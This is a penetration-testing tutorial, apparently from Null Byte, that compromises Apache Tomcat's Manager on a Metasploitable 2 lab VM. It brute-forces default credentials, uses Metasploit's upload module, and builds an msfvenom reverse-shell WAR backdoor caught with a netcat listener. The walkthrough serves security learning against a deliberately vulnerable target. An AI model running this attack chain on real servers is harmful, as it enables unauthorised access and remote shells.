Web applications are a prime target for hackers, but sometimes it's not just the web apps themselves that are vulnerable. Web management interfaces should be scrutinized just as hard as the apps they manage, especially when they contain some sort of upload functionality. By exploiting a vulnerability in Apache Tomcat, a hacker can upload a backdoor and get a shell.
Apache Tomcat is an open-source implementation of several Java technologies, including Java Servlet, JSP, Java EL, and WebSocket. What this does is provide an environment where Java code can run over HTTP. It was first released in 1998 and is still developed and maintained today under the Apache License 2.0.
Tomcat uses WAR (Web Application Archive) files to deploy web apps via servlets. These files are similar to JAR files but contain everything the web app needs, such as JavaScript, CSS, etc. Previous versions of Apache Tomcat included a vulnerability that allowed attackers to upload and deploy a WAR backdoor.
We will be using Kali Linux to attack an instance of Metasploitable 2, an intentionally vulnerable virtual machine, to highlight the Tomcat vulnerability.
Target Enumeration
We can begin by performing an Nmap scan on the target to verify that Apache Tomcat is running. The -sV switch will attempt to determine the name and version of any available service:
~# nmap -sV 10.10.0.50
Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-06 11:33 CDT
Nmap scan report for 10.10.0.50
Host is up (0.0032s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet?
25/tcp open smtp?
53/tcp open domain?
80/tcp open tcpwrapped
111/tcp open rpcbind?
139/tcp open netbios-ssn?
445/tcp open microsoft-ds?
512/tcp open exec?
513/tcp open login?
514/tcp open shell?
1099/tcp open rmiregistry?
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs?
2121/tcp open ccproxy-ftp?
3306/tcp open mysql?
5432/tcp open postgresql?
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11?
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13?
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:1D:09:55:B1:3B (Dell)
Service Info: Host: irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We can see that Tomcat is indeed running on HTTP port 8180.
Next, for this exploit to work reliably, we need a valid set of credentials. Metasploit has an auxiliary scanner that will attempt to brute-force Tomcat's Manager application. We can launch Metasploit by typing msfconsole in the terminal.
~# msfconsole
[-] ***rting the Metasploit Framework console...-
[-] * WARNING: No database support: No database YAML file
[-] ***
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
https://metasploit.com
=[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 >
Use the search command to find any modules dealing with Apache Tomcat:
msf5 > search tomcat
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/http/tomcat_administration normal Yes Tomcat Administration Tool Default Access
1 auxiliary/admin/http/tomcat_utf8_traversal 2009-01-09 normal Yes Tomcat UTF-8 Directory Traversal Vulnerability
2 auxiliary/admin/http/trendmicro_dlp_traversal 2009-01-09 normal Yes TrendMicro Data Loss Prevention 5.5 Directory Traversal
3 auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal No Apache Commons FileUpload and Apache Tomcat DoS
4 auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal No Apache Tomcat Transfer-Encoding Information Disclosure and DoS
5 auxiliary/dos/http/hashcollision_dos 2011-12-28 normal No Hashtable Collisions
6 auxiliary/scanner/http/tomcat_enum normal Yes Apache Tomcat User Enumeration
7 auxiliary/scanner/http/tomcat_mgr_login normal Yes Tomcat Application Manager Login Utility
8 exploit/linux/http/cisco_prime_inf_rce 2018-10-04 excellent Yes Cisco Prime Infrastructure Unauthenticated Remote Code Execution
9 exploit/linux/http/cpi_tararchive_upload 2019-05-15 excellent Yes Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
10 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
11 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution
12 exploit/multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution
13 exploit/multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass
14 exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution
15 exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution
16 exploit/multi/http/zenworks_configuration_management_upload 2015-04-07 excellent Yes Novell ZENworks Configuration Management Arbitrary File Upload
17 exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10 excellent Yes Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
18 post/multi/gather/tomcat_gather normal No Gather Tomcat Credentials
19 post/windows/gather/enum_tomcat normal No Windows Gather Apache Tomcat Enumeration
We will be using the tomcat_mgr_login module, so load it up with the use command:
msf5 > use auxiliary/scanner/http/tomcat_mgr_login
Now we can take a look at the options to see the available settings:
msf5 auxiliary(scanner/http/tomcat_mgr_login) > options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no The HTTP password to specify for authentication
PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
First, set the remote hosts option to the IP address of our target:
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.10.0.50
rhosts => 10.10.0.50
And since Tomcat is running on port 8180, set the remote port as well:
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
rport => 8180
That should be all we have to do to run this scanner. Type run to kick it off:
msf5 auxiliary(scanner/http/tomcat_mgr_login) > run
[!] No active DB -- Credential data will not be saved!
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 10.10.0.50:8180 - Login Successful: tomcat:tomcat
[-] 10.10.0.50:8180 - LOGIN FAILED: both:admin (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:manager (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:role1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:root (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 10.10.0.50:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We can see it attempt to log in using various combinations of default usernames and passwords. It looks like one login was successful with the username and password both being tomcat.
Get a Shell with Metasploit
Now that we have a valid set of credentials, we can exploit the vulnerability in Tomcat's Manager application. Back in our search results, locate the tomcat_mgr_upload exploit module, and load it with the use command:
msf5 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload
Then, we can take a look at the current settings:
msf5 exploit(multi/http/tomcat_mgr_upload) > options
Module options (exploit/multi/http/tomcat_mgr_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword no The password for the specified username
HttpUsername no The username to authenticate as
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Java Universal
We will want to set the remote hosts option:
msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 10.10.0.50
rhosts => 10.10.0.50
And the correct remote port:
msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8180
rport => 8180
We can also set the username at this point:
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
And the password:
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword tomcat
HttpPassword => tomcat
We'll want to use an appropriate payload as well. To view the available payloads, use the show command:
msf5 exploit(multi/http/tomcat_mgr_upload) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 generic/custom normal No Custom Payload
1 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline
4 java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline
5 java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager
6 java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager
7 java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager
8 java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager
9 java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager
10 java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager
11 java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline
12 multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures)
13 multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures)
The java/shell_reverse_tcp payload will work in this case. Use the set command to set it as the current payload:
msf5 exploit(multi/http/tomcat_mgr_upload) > set payload java/shell_reverse_tcp
payload => java/shell_reverse_tcp
Since we are using a reverse shell, we need to specify our local machine's IP address:
msf5 exploit(multi/http/tomcat_mgr_upload) > set lhost 10.10.0.1
lhost => 10.10.0.1
And a local port of our choosing:
msf5 exploit(multi/http/tomcat_mgr_upload) > set lport 4321
lport => 4321
We should be good to go at this point. Simply type run to launch the exploit:
msf5 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 10.10.0.1:4321
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying LUMzvVZI0wSUrt...
[*] Executing LUMzvVZI0wSUrt...
[*] Command shell session 1 opened (10.10.0.1:4321 -> 10.10.0.50:44738) at 2020-01-06 11:59:06 -0500
[*] Undeploying LUMzvVZI0wSUrt ...
We can see that a session was successfully opened. We now have a basic command shell and can run commands like id and uname -a to verify we have compromised the target:
~# id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
~# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
WAR File Backdoor
Using Metasploit is easy, but it's not the only way to perform this exploit. We can upload a malicious WAR file manually to get a better idea of what's going on under the hood. To begin, we can use msfvenom to create our backdoor WAR file:
~# msfvenom -p java/shell_reverse_tcp lhost=10.10.0.1 lport=4321 -f war -o pwn.war
Payload size: 13395 bytes
Final size of war file: 13395 bytes
Saved as: pwn.war
In the above command, the -p flag specifies the payload, lhost is the IP address of our local machine, lport is the listening port on our machine, the -f flag specifies the desired format, and the -o flag is the name of the output file.
Next, we need to log into Apache Tomcat. In the browser, go to the IP address of the target on port 8180, and we should see the Apache Tomcat welcome page:
Next, click on the "Tomcat Manager" link, and we should be presented with an authentication form where we can log in using the default credentials we found earlier:
Scroll down to the "Deploy" section, and browse to the WAR file we just created with msfvenom:
Click the "Deploy" button, and we should be brought back to the top of the page. Now, all we have to do is click on the file we just deployed and our payload will run.
But first, we need to set up a listener on our local machine. Netcat is always a good choice — just make sure to use the same port we specified earlier with msfvenom:
~# nc -lvnp 4321
listening on [any] 4321 ...
Finally, back in the Manager application, locate the name of the file we deployed and click on it:
If everything worked properly, we should see a connection open on our Netcat listener:
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 43521
And again, we can issue commands like id and uname -a to verify we have pwned the target, and we now have a shell as the tomcat55 user.
~# id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
~# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
At this point, the next step would probably be attempting to escalate privileges to fully compromise the system — and remember to upgrade this dumb shell to make things easier.
Wrapping Up
In this tutorial, we learned a bit about Apache Tomcat and a vulnerability that allowed us to upload a malicious WAR file and get a shell. First, we enumerated the target with Nmap and found some valid credentials using a scanner. Then, we were able to exploit the vulnerability with both Metasploit and by manually uploading a WAR file backdoor. Often, when hacking or pentesting, the way to a shell is by abusing some functionality to do something unintended.
Cover image by frabre/Pixabay; Screenshots by drd_/Null Byte
Comments
No Comments Exist
Be the first, drop a comment!